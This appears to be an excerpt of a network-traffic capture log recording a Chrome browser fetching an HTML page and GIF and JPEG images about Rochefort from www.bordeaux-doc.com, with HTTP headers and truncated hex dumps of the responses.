Jan 15, 2025 10:25:20.124125957 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:20 GMT Content-Type: text/html Content-Length: 3792 Connection: keep-alive Last-Modified: Sun, 20 Jan 2013 20:40:34 GMT ETag: "2877-4d3be5b3b0b2c-gzip" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 5a d9 72 1b b9 15 7d d7 57 c0 4c cd 44 8a b9 35 77 5a 24 6b 64 45 ca 4c 32 5e 4a 56 9c 4a 4d f9 01 dd 0d 92 b0 9a 0d 1a 8d 26 c5 71 f9 83 f2 97 39 17 e8 8d 14 25 27 ce cc 53 54 96 d5 0b ee 82 bb 9e 0b 72 b2 34 ab 68 76 72 32 59 0a 1e ce 4e 26 2b 61 38 5b 1a b3 6e 88 4f a9 dc 4c 6b 97 2a 36 22 36 8d db dd 5a d4 4e 02 77 37 ad 19 71 6f 5a 44 7b ce 82 25 d7 89 30 53 99 a8 c6 68 d4 1f 37 bc 5a ce 28 e6 2b 31 ad 85 22 09 b4 5c 1b a9 e2 0a 87 9f 62 a6 74 28 34 33 8a ad b5 32 22 30 ec 46 05 4b 31 57 da d4 99 59 0a 76 fd e6 e6 96 bd 7c f3 cf 8b 9b 3f d3 92 8f b4 64 cb 13 c6 d7 b8 db 88 90 f9 3b f6 52 c5 7c cd b5 11 4d f6 26 66 9c ad 64 24 0d d7 3b b6 56 32 36 4c cd d9 46 8a 6d 9d 49 47 aa fc 44 45 82 56 bf 4c 0d 44 87 7c 47 af 24 98 32 6c 82 41 38 ae fe a1 74 14 b2 ad 0c 05 9b f3 95 4a 13 76 fb 9e 2d b0 99 e6 c1 d6 ee c4 6e 8b 5d 24 35 56 ec eb 2f 17 af ae de d5 0f d6 fd e5 ea f5 d5 cd c5 ed 9b 9b ca c2 57 32 d0 2a 51 73 c3 ae 35 9e bd e5 0b c1 ae ee d7 5a 24 09 eb 34 db c4 [TRUNCATED] Data Ascii: Zr}WLD5wZ$kdEL2^JVJM&q9%'STr4hvr2YN&+a8[nOLk6"6ZNw7qoZD{%0Sh7Z(+1"\bt(432"0FK1WYv\|?d;R\|M&fd$;V26LFmIGDEVLD\|G$2lA8tJv-n]$5V/W2Qs5Z$4H5}'-dr;*1w8[+pmF]K-I#X1{[Mk,5,~&Fw"Ftu\-XR;Wg{[XB>([&q!OGtRLZB&4v+'.Ado{Zc)<Uv;8TsMyGs9?n2Ia>:_n"LI8p>@nU$M,h/gvIQk"Gt/bet>{my}WN";Unx?=f,n7G>i0v-igJ{cg[%Iy,)xh+5o{T".mlg\|,m#C8;&r/YmXd:M`@(k9zcP.yCxU{
Jan 15, 2025 10:25:20.124181032 CET	1236	IN	Data Raw: 83 cc 2a bd cc a8 ce b0 e4 2d 6b 54 2f db 4a 76 0d 65 8b 10 83 ba bd 5c fa f0 1b 2d 37 b6 ec c7 a3 cc 24 bd df 94 7b 11 c9 ce 37 55 3f f4 9c f7 69 cb df 66 1c 2b d1 b3 bf 7b c6 1e 3a b7 77 da 36 23 86 59 32 1c e1 ee a2 35 4b f1 5c c9 a7 f2 d5 06 Data Ascii: *-kT/Jve\-7${7U?if+{:w6#Y25K\Eh28#m^wly$0EUqvga.(qETW{(P6\|dQJeCaYw2:wydy2Gc"%
Jan 15, 2025 10:25:20.124218941 CET	1236	IN	Data Raw: 2b 8e 5b 18 41 90 66 e4 28 a8 c5 37 82 76 5e 30 d0 62 4d 06 cd 9c 55 35 6e ce c5 3e bb 8a 85 c9 bd 91 d0 19 70 c1 e0 5a f8 3a a5 93 e0 9e 59 d6 69 2b dd 7a 35 35 1e 39 50 de db c0 b5 d4 c0 2b 97 48 c2 34 aa 9e 34 1f 96 41 82 39 c7 cb e0 53 e0 e7 Data Ascii: +[Af(7v^0bMU5n>pZ:Yi+z559P+H44A9S)\=Nr[EXP6c\|EWV-,F4+e(SZk7S:P,8sFk^%J#]]%lRRh+;\|I(f35{^=K@4jXx
Jan 15, 2025 10:25:20.124255896 CET	374	IN	Data Raw: 43 0c b3 ad 33 37 9b ff 4d ec 92 6a 91 ad d4 09 b7 c0 b5 e6 dd ca 57 84 b4 1c d8 f0 55 1c 56 31 5f 79 18 23 49 b2 d5 95 2a 72 05 cc e4 70 10 70 fb 29 f4 db 68 34 be 5f 90 d0 20 40 20 db 53 38 c5 5e cb 40 45 b0 d9 f5 c5 df 2f 7f bc ba b9 b9 aa 4f Data Ascii: C37MjWUV1_y#Irpp)h4_ @ S8^@E/O,%Ol J8Gg;o<'J}3!11&OQKczr6(+X*UhdC522xk89a5i@qo}$Q#POEKi
Jan 15, 2025 10:25:20.145011902 CET	447	OUT	GET /ville_de_rochefort/Roch/Pict/Boy.gif HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:20.330447912 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:20 GMT Content-Type: image/gif Content-Length: 1409 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:46:31 GMT ETag: "581-3db69e50cc3c0" Accept-Ranges: bytes Data Raw: 47 49 46 38 37 61 2a 00 23 00 f7 00 00 ff ff ff ff ff cc ff ff 99 ff ff 66 ff ff 33 ff ff 00 ff cc ff ff cc cc ff cc 99 ff cc 66 ff cc 33 ff cc 00 ff 99 ff ff 99 cc ff 99 99 ff 99 66 ff 99 33 ff 99 00 ff 66 ff ff 66 cc ff 66 99 ff 66 66 ff 66 33 ff 66 00 ff 33 ff ff 33 cc ff 33 99 ff 33 66 ff 33 33 ff 33 00 ff 00 ff ff 00 cc ff 00 99 ff 00 66 ff 00 33 ff 00 00 cc ff ff cc ff cc cc ff 99 cc ff 66 cc ff 33 cc ff 00 cc cc ff cc cc cc cc cc 99 cc cc 66 cc cc 33 cc cc 00 cc 99 ff cc 99 cc cc 99 99 cc 99 66 cc 99 33 cc 99 00 cc 66 ff cc 66 cc cc 66 99 cc 66 66 cc 66 33 cc 66 00 cc 33 ff cc 33 cc cc 33 99 cc 33 66 cc 33 33 cc 33 00 cc 00 ff cc 00 cc cc 00 99 cc 00 66 cc 00 33 cc 00 00 99 ff ff 99 ff cc 99 ff 99 99 ff 66 99 ff 33 99 ff 00 99 cc ff 99 cc cc 99 cc 99 99 cc 66 99 cc 33 99 cc 00 99 99 ff 99 99 cc 99 99 99 99 99 66 99 99 33 99 99 00 99 66 ff 99 66 cc 99 66 99 99 66 66 99 66 33 99 66 00 99 33 ff 99 33 cc 99 33 99 99 33 66 99 33 33 99 33 00 99 00 ff 99 00 cc 99 00 99 99 00 66 99 00 33 99 00 00 66 [TRUNCATED] Data Ascii: GIF87a#f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3ffffff3fffffff3fffffff3ffffffffffff3fff3f3f3f3ff33f3ffffff3f3333f3333333f3333333f3333f3f3f3ff3f33f33333333f333333333f333f3f3f3ffffff3f3333f333f3wUD"wUD"wUD"wwwUUUDDD"""!Adobe !,#H*\H1%Q$F4ftIh@wp8";VF2hXq@ztk:Z,,HddH-6X),d$nli4:^{g9sfNw=
Jan 15, 2025 10:25:20.330499887 CET	410	IN	Data Raw: d8 55 b4 d2 9a 02 5b ec 18 98 e5 22 80 16 3a ea d5 9b f1 c5 9e 8a 2f 2c d8 4e 36 78 20 8b 47 17 4a 67 94 ac 07 20 ac c0 7a 3b d4 02 f8 f8 9a 06 82 00 b8 c5 1e 36 d8 62 ab e5 15 c2 03 dc 74 3a ba c6 8c 96 08 b2 70 ff 9e a1 f3 68 54 bf 4b 07 c6 f4 Data Ascii: U[":/,N6x GJg z;6bt:phTK%UgAxuRJT@rF= -EM-U_\U\|@}@c5(U)\#VYQqNUydXQF@(f. X]UtbGgUGJG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.145308971 CET	448	OUT	GET /ville_de_rochefort/Roch/Pict/Roch.gif HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:20.332669973 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:20 GMT Content-Type: image/gif Content-Length: 2982 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:45:00 GMT ETag: "ba6-3db69dfa03700" Accept-Ranges: bytes Data Raw: 47 49 46 38 37 61 ff 00 39 00 f7 00 00 ff ff ff ff ff cc ff ff 99 ff ff 66 ff ff 33 ff ff 00 ff cc ff ff cc cc ff cc 99 ff cc 66 ff cc 33 ff cc 00 ff 99 ff ff 99 cc ff 99 99 ff 99 66 ff 99 33 ff 99 00 ff 66 ff ff 66 cc ff 66 99 ff 66 66 ff 66 33 ff 66 00 ff 33 ff ff 33 cc ff 33 99 ff 33 66 ff 33 33 ff 33 00 ff 00 ff ff 00 cc ff 00 99 ff 00 66 ff 00 33 ff 00 00 cc ff ff cc ff cc cc ff 99 cc ff 66 cc ff 33 cc ff 00 cc cc ff cc cc cc cc cc 99 cc cc 66 cc cc 33 cc cc 00 cc 99 ff cc 99 cc cc 99 99 cc 99 66 cc 99 33 cc 99 00 cc 66 ff cc 66 cc cc 66 99 cc 66 66 cc 66 33 cc 66 00 cc 33 ff cc 33 cc cc 33 99 cc 33 66 cc 33 33 cc 33 00 cc 00 ff cc 00 cc cc 00 99 cc 00 66 cc 00 33 cc 00 00 99 ff ff 99 ff cc 99 ff 99 99 ff 66 99 ff 33 99 ff 00 99 cc ff 99 cc cc 99 cc 99 99 cc 66 99 cc 33 99 cc 00 99 99 ff 99 99 cc 99 99 99 99 99 66 99 99 33 99 99 00 99 66 ff 99 66 cc 99 66 99 99 66 66 99 66 33 99 66 00 99 33 ff 99 33 cc 99 33 99 99 33 66 99 33 33 99 33 00 99 00 ff 99 00 cc 99 00 99 99 00 66 99 00 33 99 00 00 66 [TRUNCATED] Data Ascii: GIF87a9f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3f3f3f3ffffff3f3333f333f3ffffff3fffffff3fffffff3ffffffffffff3fff3f3f3f3ff33f3ffffff3f3333f3333333f3333333f3333f3f3f3ff3f33f33333333f333333333f333f3f3f3ffffff3f3333f333f3wUD"wUD"wUD"wwwUUUDDD"""!Adobe !,9H*\#JH3j CI(S&"{+b &<s'QUlf) si<H.IUSQ'VeeEH<,Yfev=kK^^U)0cuYg+.&Xn{YL?
Jan 15, 2025 10:25:20.332707882 CET	1236	IN	Data Raw: 6c d5 69 67 b7 a4 ee 49 0e 5d 99 ea e7 7b 48 49 90 9e 9a 27 0f 20 64 cf 48 7d 2e 1c ba 63 95 d9 79 56 dc 7b 72 ef 5e 1e b1 6e 9f e0 5b bd f8 c9 ec cf 2b 90 22 b7 5a 05 fa 8a 2a d5 ed ad e0 dd 7b 23 d1 a2 c5 a1 17 ff ff 5e 34 38 ec ee e4 77 42 37 Data Ascii: ligI]{HI' dH}.cyV{r^n[+"Z{#^48wB76f3?Y'"B_f6eM^fhn~Dy\LXsTc\|%@n}OlMVa^!\|AFFiSU#F$0_[aVn9
Jan 15, 2025 10:25:20.332745075 CET	747	IN	Data Raw: 4f dd 72 42 89 24 31 54 0a 3d 68 62 9e 29 3e 14 d2 32 21 60 f5 08 57 39 c8 aa ac 85 27 ac 35 7a a9 14 0b b4 20 a2 96 6d 6b 64 54 97 cb 8c 22 22 bf 1e a8 93 36 42 c8 68 d4 c5 b5 a2 64 31 93 6e 19 05 03 23 45 ad fd f4 72 85 39 64 d2 1f 8a 13 28 67 Data Ascii: OrB$1T=hb)>2!`W9'5z mkdT""6Bhd1n#Er9d(gHH#S#UO=EC3F2!{$8c_/5(*WUmd+guG1Yue$c334;)T3BvO);]YoV.ct5XD>I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.150826931 CET	448	OUT	GET /ville_de_rochefort/Roch/Pict/Boya.jpg HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:20.791794062 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:20 GMT Content-Type: image/jpeg Content-Length: 15450 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:46:26 GMT ETag: "3c5a-3db69e4c07880" Accept-Ranges: bytes Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c2 00 11 08 00 da 01 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 ff c4 00 18 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 50 0f 4f 98 00 00 00 00 00 00 00 00 00 00 2e d4 d2 43 89 80 17 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 6b a1 9d 52 e1 60 5f 55 5c 6f 5c de 78 ed a5 40 7b 43 9a 74 b3 12 87 8b 11 18 c3 59 80 2c 00 00 00 00 00 00 00 00 d2 d9 de 24 4e b2 06 e6 03 9a 63 69 [TRUNCATED] Data Ascii: JFIFHHC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO8"PO.C kR`_U\o\x@{CtY,$Nci]9HqK]n0IFy=~U)KMd3HSv)gK4j'4[ztbNFs<'s]U[c5}]Vp]-K_ZTB$u:\s:sblH=O3VWEu1K;Aslh7w=3U&2Q4GX:@K_=J\&kGLWFu\c+?ys_o,DO~JQ>ZCD69wCGa&G3=\ $,z'9(L$ZL;.Q;5R u3dZ@xOj3g{}/gM$"g:eicK-cR.cztUS$hhgZ{r]SxVf7H:BBKG.tSiw"SiZoXjI)h2lkVj.gy7LuwFpV8m-64iPRI:ebrL+VsbXu
Jan 15, 2025 10:25:20.791830063 CET	1236	IN	Data Raw: ad 11 01 5a c9 60 90 90 09 89 09 92 a0 98 dc 90 35 34 a5 35 c4 a9 d3 45 70 37 c1 66 60 8a 58 02 f8 eb 8b 79 22 09 9b 44 44 95 94 cd ea b8 c9 54 9b 86 75 be 45 ad 12 00 00 01 6a d8 92 d5 d4 08 d3 70 20 d4 ff c4 00 2b 10 00 02 02 01 03 03 04 01 04 Data Ascii: Z`545Ep7f`Xy"DDTuEjp +!1 "0A2#3B$@PCX-EkF96liRzv}NJ8a+viRmk7l{::8=.Z0Vj**tdoox@
Jan 15, 2025 10:25:20.791841030 CET	1236	IN	Data Raw: 0b 32 04 d7 35 a8 06 d1 1a e8 ce 4c 26 0c cd 13 c4 cc c6 26 a9 ab 03 5e 7e 1c fa 8c 2a 27 b8 45 b2 07 9a b8 d7 35 4d 53 54 2d 32 73 a8 42 d1 55 dd 85 71 55 3b 64 43 cc c4 c4 c4 c4 03 1e 91 df 54 26 67 b7 33 99 ab d1 89 a6 69 9a 4c 19 9e e9 d3 54 Data Ascii: 25L&&^~*'E5MST-2sBUqU;dCT&g3iLT-+]0!cw;V;sA"=33 39=>AL}->u-r>}}\|># 0@1?WJg:u
Jan 15, 2025 10:25:20.791853905 CET	1236	IN	Data Raw: c3 72 97 61 3e 9c 5b 0a e0 00 b3 6f db 92 24 93 75 01 ec 11 a7 c5 fa 2c db a3 91 54 61 23 8c 42 f9 5b d5 00 73 19 a9 d2 11 10 3c bf 74 64 50 58 ca 74 ca fd b6 5c 00 76 37 0f 0a 24 f1 51 0b e3 19 9a 40 1b 0a 3d c3 5a 30 e7 53 2a 60 0e 43 61 4d 68 Data Ascii: ra>[o$u,Ta#B[s<tdPXt\v7$Q@=Z0S*`CaMhtF\|D+)ay51"!t_v[xc+J].H$H/Z\@Yf2b7Um$\b`W:z!^hVfQ>+`gaiUjOe
Jan 15, 2025 10:25:20.791865110 CET	1236	IN	Data Raw: ec 70 df 17 78 08 7a 8d 61 7d ae 25 56 89 74 25 ec 41 37 dd 92 dc 0d 8d 0f 85 b3 05 00 ae 15 85 2d bd e1 f9 4b ad 15 a5 06 5c db 8e 66 6b ad 1f 89 57 c4 4d 03 c8 b0 6b 63 43 e6 2d 8f e3 d2 3a fa d4 e1 a8 58 db e0 1f e6 e7 22 66 04 af d7 46 09 75 Data Ascii: pxza}%Vt%A7-K\fkWMkcC-:X"fFuk;&gk'hQPW20%oWeT4~b-E\|z&g:N36^n{o%R.^7qJFmk7l/
Jan 15, 2025 10:25:20.791877985 CET	1120	IN	Data Raw: ea 7c 63 87 4b 20 c5 b6 3a cb 0a cc ed 39 78 4a 28 38 cd 5c 32 c6 57 09 a1 48 f2 a1 eb 2b 4a 50 b6 4c 96 18 00 5d fd 35 28 aa 2c 37 0f 65 b2 e0 bb fc c2 15 75 fe ad b2 c2 a5 4a 3b b9 70 df 6c 80 78 52 fa c6 71 05 67 a3 78 1e 79 61 a8 60 aa 64 3a Data Ascii: \|cK :9xJ(8\2WH+JPL]5(,7euJ;plxRqgxya`d:orpq@]0zPDOY.s5vSC\|as-jb@!8[m\[s7o[)VVx+@g~-KsPPD0NJz.Sggc<0&TrF:4:&(
Jan 15, 2025 10:25:20.791919947 CET	1236	IN	Data Raw: 7d b3 04 50 ca d2 f5 30 c6 0e 5b ea 99 67 27 6b 44 55 6f e0 54 0d 24 01 33 3e 10 e6 39 97 53 19 96 a9 6b e1 59 73 37 9c 45 69 c2 63 d9 32 d0 c6 ed fc 44 5d bd e5 fa ca 5b a1 ca b7 1a 68 ee 96 df 9d 7c 4c 39 1f 0f a8 1f c3 18 5c bc 59 37 2a 57 b5 Data Ascii: }P0[g'kDUoT$3>9SkYs7Eic2D][h\|L9\Y7*W~erc&Ve`_eJg<BP=.#4lh,oP.c;A/#{FZ\l8(_y~ZQE6:Rl{&]Ubh+JkOX,s3G4{f(
Jan 15, 2025 10:25:20.791932106 CET	1236	IN	Data Raw: 4f 33 d8 fd 1a fa 1e df 93 26 16 20 87 fa 1b c5 2f d1 b5 11 4b b3 f3 3d c2 c4 ca 29 47 82 c3 9e 0d 12 8f 4d 0d 78 6c 99 e8 84 42 9a 22 56 23 59 84 c2 1f 20 fc db 15 7a 13 31 d0 92 e0 f5 ba 42 1b 2e 15 9b f0 a2 cb 54 42 20 6e e1 71 51 a3 45 f2 98 Data Ascii: O3& /K=)GMxlB"V#Y z1B.TB nqQEcF}^=hI/EH>f6L!! 1AQ0a@q?a3Z0/d}nHGJ+`F8ZN_wJ`wobe`_yPft
Jan 15, 2025 10:25:20.791944027 CET	1236	IN	Data Raw: e0 9a ab 36 1d 36 cf 03 97 23 23 b9 a3 2a 79 6e 21 e7 87 14 65 81 8a 76 13 0d af b6 c1 c1 f4 dc 0b 36 20 81 83 13 ab ec cb b6 a5 02 29 bb c1 c5 55 f3 d6 70 cd 9a 7b 81 ed 42 cd ad 6f 24 f5 b8 20 0e 51 20 cd 72 ce 6a 8f 14 03 2a d5 9b 78 1e 1d 38 Data Ascii: 66##yn!ev6 )Up{Bo$ Q rjx81Q]-nB;vm8Y(<.W}<PWq.#$ H1]C)\r(9ZMKy sk`;3sAXj4$*jshYDg8ZIt~V>(y
Jan 15, 2025 10:25:20.791954994 CET	1236	IN	Data Raw: 22 1e b8 79 c3 8b e7 20 08 20 8a 6a 50 71 a2 dd 05 62 b8 a9 cc 00 47 d7 24 c5 ae 27 21 c9 03 d5 62 2f a3 bc 21 47 a5 d9 7a 44 ba c1 4a d9 3d 04 bc 13 66 93 b9 94 57 47 28 50 5a 74 65 b4 64 39 c9 32 dc d6 b1 b2 a2 92 d4 ef d6 45 e5 41 44 f8 1b 2f Data Ascii: "y jPqbG$'!b/!GzDJ=fWG(PZted92EAD/bY{"T" 9G]gq@{w1vq@w}`>L8Rf?\ 0^+MoSjkI7#+e4nkTF9Fs@@zx8N
Jan 15, 2025 10:25:20.796766043 CET	1236	IN	Data Raw: 6a 63 82 aa b3 d8 34 3b c1 a5 01 ba 98 e6 f5 e3 87 e9 9b 0d 58 86 13 eb fc f8 cb 5a 9c 00 47 7f 87 e9 9b 2c 09 b5 05 71 a0 39 68 b4 f6 e3 02 e8 14 c1 14 77 d3 ad 5f 58 e6 0b 82 ed 4a f4 0e 55 e4 9c cc 01 d2 c4 2a 6c 00 be 29 4e d3 1b 01 65 3e f7 Data Ascii: jc4;XZG,q9hw_XJU*l)Ne>nzDf=n]-g&n"=uH [7'^vo9"3r\|wTU{7[iU:yBG.`^qq38WwY)hY8auh{V
Jan 15, 2025 10:25:20.890036106 CET	422	OUT	GET /favicon.ico HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:21.122523069 CET	1126	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:20 GMT Content-Type: image/vnd.microsoft.icon Content-Length: 875 Connection: keep-alive Last-Modified: Wed, 16 Nov 2005 09:54:50 GMT ETag: "36b-405abb1f4ce80" Accept-Ranges: bytes Data Raw: 47 49 46 38 39 61 10 00 10 00 f7 00 00 04 02 04 fc fe fc fc 02 04 77 00 00 08 00 64 50 00 00 15 00 2e 00 00 00 34 a8 69 00 05 00 00 15 63 c0 00 00 00 00 6f 00 00 00 00 00 00 00 00 00 7c 00 00 20 00 00 00 00 00 00 00 00 16 00 00 20 00 00 00 00 00 00 00 00 44 80 c4 00 3e a3 00 39 12 00 00 00 56 b0 00 00 a2 00 00 43 15 00 43 00 b0 03 e6 02 00 17 00 00 f5 00 00 77 00 00 66 03 00 00 00 00 00 00 00 00 04 00 a8 a2 00 19 12 00 15 00 00 00 53 00 00 21 00 00 e7 00 15 77 00 00 00 2e d0 00 ec 02 01 fd 18 00 7f 00 00 02 9c 00 00 a3 15 00 12 00 00 00 38 2e 00 a4 00 00 12 08 00 00 02 00 37 c9 e4 b6 1d a5 4b f5 12 00 77 00 66 45 05 00 00 90 00 00 f7 00 01 77 50 2e f0 a4 00 d5 12 00 f6 00 00 77 24 17 ff a4 00 ff 12 00 ff 00 00 ff 72 00 e6 72 ec 17 4e fd f5 00 7f 77 e2 2e 78 ff 00 17 ff 30 f5 ff 00 77 00 00 b2 00 a3 17 00 12 f5 00 00 77 58 00 00 b5 00 00 4b 15 00 00 00 00 d0 e6 c8 b0 17 00 12 f5 2c 00 77 01 1e 45 04 00 00 00 00 00 00 00 00 00 50 78 00 a4 13 00 12 15 00 00 00 00 24 00 10 a4 00 a6 12 15 12 00 00 00 d0 [TRUNCATED] Data Ascii: GIF89awdP.4ico\| D>9VCCwfS!w.8.7KwfEwP.w$rrNw.x0wwXK,wEPx$0w,@A9w l[wwwkwXxwwwwHP(wxl[w<Pw)wwhjd/wwpwKPsPrNld/ww4N<<Nwh0Oo5witG.zerl!,HH@\`C0:Q"E10%C$)bB =fy#6\|x;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:20.198314905 CET	449	OUT	GET /ville_de_rochefort/Roch/Pict/Boya1.jpg HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:20.832904100 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:20 GMT Content-Type: image/jpeg Content-Length: 3078 Connection: keep-alive Last-Modified: Thu, 27 May 2004 15:46:23 GMT ETag: "c06-3db69e492b1c0" Accept-Ranges: bytes Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c2 00 11 08 00 5b 00 82 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 ff c4 00 18 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 02 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 c8 07 a7 cc 00 00 04 c4 0c a3 2d cf 49 36 56 5c a6 e5 19 8d 79 ba e6 a0 58 12 2c 12 e2 b6 ec 73 b0 d9 2d 45 39 bb 68 84 4b a9 99 98 6a 8a b2 b4 73 f5 73 f4 e1 40 6b 8c 81 3b bb 73 e9 e6 f5 6a eb e1 aa 25 b0 51 77 cd 4b 4b 6b 64 cc 14 cc 1d 4e 5d 89 36 9a 65 8c 84 ab b4 65 d3 cb [TRUNCATED] Data Ascii: JFIFHHC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO["-I6V\yX,s-E9hKjss@k;sj%QwKKkdN]6eeM\|eS^%_n~:rY6kgW^^VdV&!5%yb`n}QXEI2[R& !"12304@bpJ(+4C8Oj+D\9{enmAn4ITIbA{rlJ.?a}d{6\|`avM}N_ROiPO5_=7Gc,:6/9<A2Esrb5-%flOa>Bxi96,7wi&dC3Y(vqB{>z~;O 1!?G<SGT$R-b !1?+zrDn]}#O-! "1AQ2aq0@BR?9hW5+b5XH* Tx[_J='47rq<
Jan 15, 2025 10:25:20.833066940 CET	1236	IN	Data Raw: 3a bf e9 41 0f ae ca 9f 57 80 45 ad 16 60 6c a4 6e 6a 15 18 5c b0 eb b2 c4 4c 4f 03 03 ba a9 10 89 33 6b 75 d4 a2 2b 45 5b 99 4a 69 54 58 9a 2a a8 2c a2 58 0f ca c6 a8 d0 8e 4b 00 93 a2 e6 88 db 55 31 5c 94 0f c6 f3 50 99 c3 97 0c 64 1f 68 58 22 Data Ascii: :AWE`lnj\LO3ku+E[JiTX,XKU1\PdhX"]Y. t]x@ET&,wL!u?e\1$(0rVBm@FA-V0O@V\mnM"}.e"V8oUJIYaz4,#WWsTkA&
